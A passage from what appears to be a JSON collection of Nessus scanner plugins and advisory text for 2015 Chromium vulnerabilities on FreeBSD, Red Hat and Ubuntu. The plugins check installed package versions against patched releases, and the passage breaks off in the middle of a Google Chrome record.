CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83095);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\", \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1244\", \"CVE-2015-1245\", \"CVE-2015-1246\", \"CVE-2015-1247\", \"CVE-2015-1248\", \"CVE-2015-1249\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (b57f690e-ecc9-11e4-876c-00262d5ed8ee)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n45 new security fixes, including :\n\n- [456518] High CVE-2015-1235: Cross-origin-bypass in HTML parser.\nCredit to anonymous.\n\n- [313939] Medium CVE-2015-1236: Cross-origin-bypass in Blink. Credit\nto Amitay Dobo.\n\n- [461191] High CVE-2015-1237: Use-after-free in IPC. Credit to Khalil\nZhani.\n\n- [445808] High CVE-2015-1238: Out-of-bounds write in Skia. Credit to\ncloudfuzzer.\n\n- [463599] Medium CVE-2015-1240: Out-of-bounds read in WebGL. Credit\nto w3bd3vil.\n\n- [418402] Medium CVE-2015-1241: Tap-Jacking. Credit to Phillip Moon\nand Matt Weston of Sandfield Information Systems.\n\n- [460917] High CVE-2015-1242: Type confusion in V8. Credit to\nfcole@onshape.com.\n\n- [455215] Medium CVE-2015-1244: HSTS bypass in WebSockets. Credit to\nMike Ruddy.\n\n- [444957] Medium CVE-2015-1245: Use-after-free in PDFium. Credit to\nKhalil Zhani.\n\n- [437399] Medium CVE-2015-1246: Out-of-bounds read in Blink. Credit\nto Atte Kettunen of OUSPG.\n\n- [429838] Medium CVE-2015-1247: Scheme issues in OpenSearch. Credit\nto Jann Horn.\n\n- [380663] Medium CVE-2015-1248: SafeBrowsing bypass. Credit to\nVittorio Gambaletta (VittGam).\n\n- [476786] CVE-2015-1249: Various fixes from internal audits, fuzzing\nand other initiatives. Multiple vulnerabilities in V8 fixed at the tip\nof the 4.2 branch (currently 4.2.77.14).\"\n );\n # http://googlechromereleases.blogspot.nl/2015/04/stable-channel-update_14.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2a57bf0f\"\n );\n # https://vuxml.freebsd.org/freebsd/b57f690e-ecc9-11e4-876c-00262d5ed8ee.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a8e7b4ce\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<42.0.2311.90\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<42.0.2311.90\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<42.0.2311.90\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:13", "description": "Updated chromium-browser packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash or, potentially, execute arbitrary code with the privileges of the user running Chromium.(CVE-2015-1235, CVE-2015-1236, CVE-2015-1237, CVE-2015-1238, CVE-2015-1240, CVE-2015-1241, CVE-2015-1242, CVE-2015-1244, CVE-2015-1245, CVE-2015-1246, CVE-2015-1247, CVE-2015-1248, CVE-2015-1249)\n\nAll Chromium users should upgrade to these updated packages, which contain Chromium version 42.0.2311.90, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the changes to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-17T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2015:0816)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6"], "id": "REDHAT-RHSA-2015-0816.NASL", "href": "https://www.tenable.com/plugins/nessus/82846", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0816. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82846);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\", \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1244\", \"CVE-2015-1245\", \"CVE-2015-1246\", \"CVE-2015-1247\", \"CVE-2015-1248\", \"CVE-2015-1249\");\n script_bugtraq_id(74165, 74167);\n script_xref(name:\"RHSA\", value:\"2015:0816\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2015:0816)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated chromium-browser packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium.(CVE-2015-1235, CVE-2015-1236, CVE-2015-1237,\nCVE-2015-1238, CVE-2015-1240, CVE-2015-1241, CVE-2015-1242,\nCVE-2015-1244, CVE-2015-1245, CVE-2015-1246, CVE-2015-1247,\nCVE-2015-1248, CVE-2015-1249)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 42.0.2311.90, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.\"\n );\n # http://googlechromereleases.blogspot.com/2015/04/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://chromereleases.googleblog.com/2015/04/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1248\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1247\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1244\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1249\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1237\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1236\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1235\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0816\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-42.0.2311.90-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-42.0.2311.90-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-42.0.2311.90-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-42.0.2311.90-1.el6_6\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:43", "description": "Several security issues were discovered in the DOM implementation in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to bypass Same Origin Policy restrictions. (CVE-2015-1253, CVE-2015-1254)\n\nA use-after-free was discovered in the WebAudio implementation in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-1255)\n\nA use-after-free was discovered in the SVG implementation in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-1256)\n\nA security issue was discovered in the SVG implementation in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash. (CVE-2015-1257)\n\nAn issue was discovered with the build of libvpx. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-1258)\n\nMultiple use-after-free issues were discovered in the WebRTC implementation in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process.\n(CVE-2015-1260)\n\nAn uninitialized value bug was discovered in the font shaping code in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash. (CVE-2015-1262)\n\nMultiple security issues were discovered in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to read uninitialized memory, cause a denial of service via application crash or execute arbitrary code with the privileges of the user invoking the program. (CVE-2015-1265)\n\nMultiple security issues were discovered in V8. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to read uninitialized memory, cause a denial of service via renderer crash or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-3910).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-22T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 14.10 / 15.04 : oxide-qt vulnerabilities (USN-2610-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1265", "CVE-2015-3910"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs", "p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs-extra", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "UBUNTU_USN-2610-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83778", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2610-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83778);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1265\", \"CVE-2015-3910\");\n script_bugtraq_id(74723, 74727);\n script_xref(name:\"USN\", value:\"2610-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 14.10 / 15.04 : oxide-qt vulnerabilities (USN-2610-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security issues were discovered in the DOM implementation in\nBlink. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit these to bypass Same\nOrigin Policy restrictions. (CVE-2015-1253, CVE-2015-1254)\n\nA use-after-free was discovered in the WebAudio implementation in\nChromium. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial\nof service via renderer crash, or execute arbitrary code with the\nprivileges of the sandboxed render process. (CVE-2015-1255)\n\nA use-after-free was discovered in the SVG implementation in Blink. If\na user were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to cause a denial of service\nvia renderer crash, or execute arbitrary code with the privileges of\nthe sandboxed render process. (CVE-2015-1256)\n\nA security issue was discovered in the SVG implementation in Blink. If\na user were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to cause a denial of service\nvia renderer crash. (CVE-2015-1257)\n\nAn issue was discovered with the build of libvpx. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via renderer\ncrash, or execute arbitrary code with the privileges of the sandboxed\nrender process. (CVE-2015-1258)\n\nMultiple use-after-free issues were discovered in the WebRTC\nimplementation in Chromium. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit these\nto cause a denial of service via renderer crash, or execute arbitrary\ncode with the privileges of the sandboxed render process.\n(CVE-2015-1260)\n\nAn uninitialized value bug was discovered in the font shaping code in\nBlink. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial\nof service via renderer crash. (CVE-2015-1262)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1265)\n\nMultiple security issues were discovered in V8. If a user were tricked\nin to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via renderer crash or execute arbitrary code with the\nprivileges of the sandboxed render process. (CVE-2015-3910).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2610-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected liboxideqtcore0, oxideqt-codecs and / or\noxideqt-codecs-extra packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|14\\.10|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 14.10 / 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.7.8-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"oxideqt-codecs\", pkgver:\"1.7.8-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"oxideqt-codecs-extra\", pkgver:\"1.7.8-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"liboxideqtcore0\", pkgver:\"1.7.8-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"oxideqt-codecs\", pkgver:\"1.7.8-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"oxideqt-codecs-extra\", pkgver:\"1.7.8-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.7.8-0ubuntu0.15.04.1\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"oxideqt-codecs\", pkgver:\"1.7.8-0ubuntu0.15.04.1\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"oxideqt-codecs-extra\", pkgver:\"1.7.8-0ubuntu0.15.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0 / oxideqt-codecs / oxideqt-codecs-extra\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:53:34", "description": "The version of Google Chrome installed on the remote Windows host is prior to 42.0.2311.90. It is, therefore, affected by multiple vulnerabilities :\n\n - A cross-origin bypass vulnerability exists due to an unspecified flaw in the HTML parser. (CVE-2015-1235)\n\n - A cross-origin bypass vulnerability exists due to a flaw in MediaElementAudioSourceNode.cpp when handling audio content. (CVE-2015-1236)\n\n - A use-after-free error exists in render_frame_impl.cc due to improper handling of a frame when it receives messages while detaching. An attacker can exploit this flaw to dereference already freed memory and execute arbitrary code. (CVE-2015-1237)\n\n - An unspecified out-of-bounds write flaw exists in the Skia filters. (CVE-2015-1238)\n\n - An out-of-bounds read flaw exists in WebGL due to improper handling of ES3 commands. An attacker can exploit this flaw to disclose memory contents.\n (CVE-2015-1240)\n\n - An unspecified tap-jacking flaw exists when certain tap events aren't preceded by TapDown events. An attacker can exploit this to direct taps to cross-pages and cross-domains. (CVE-2015-1241)\n\n - A type confusion error exists in the ReduceTransitionElementsKind() function in hydrogen-check-elimination.cc. An attacker can exploit this error to execute arbitrary code. (CVE-2015-1242)\n\n - A flaw exists related to WebSocket connections due to HTTP Strict Transport Security (HSTS) not being strictly enforced. A man-in-the-middle attacker can exploit this flaw to view and manipulate protected communication.\n (CVE-2015-1244)\n\n - A use-after-free error exists in open_pdf_in_reader_view.cc due to improper handling handling the 'Open PDF in Reader' bubble on navigations.\n An attacker can exploit this flaw to dereference already freed memory and execute arbitrary code. (CVE-2015-1245)\n\n - An unspecified out-of-bounds read flaw exists in Blink.\n An attacker can exploit this to disclose memory contents. (CVE-2015-1246)\n\n - A flaw exists in the OnPageHasOSDD() function in search_engine_tab_helper.cc due to improper handling of URLs for the OpenSearch descriptor. An attacker can exploit this flaw to disclose sensitive information.\n (CVE-2015-1247)\n\n - An unspecified flaw exists that allows an attacker to bypass SafeBrowsing. (CVE-2015-1248)\n\n - Multiple unspecified vulnerabilities exist that allow an attacker to have an unspecified impact. (CVE-2015-1249)\n\n - Multiple unspecified vulnerabilities exist in V8 that allow an attacker to cause a denial of service and other unspecified impacts.\n (CVE-2015-3333)\n\n - A media permission handling weakness exists due to camera and microphone permissions being merged into a single 'Media' permission. An attacker can exploit this, via a specially crafted website, to turn on a victim's camera while the victim believes camera access is prohibited. (CVE-2015-3334)\n\n - A flaw exists due to missing address space usage limitation (RLIMIT_AS and RLIMIT_DATA) in the Native Client (NaCl) process. This allows a remote attacker to run a crafted program in the NaCl sandbox and to conduct row-hammer attacks. (CVE-2015-3335)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-16T00:00:00", "type": "nessus", "title": "Google Chrome < 42.0.2311.90 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", 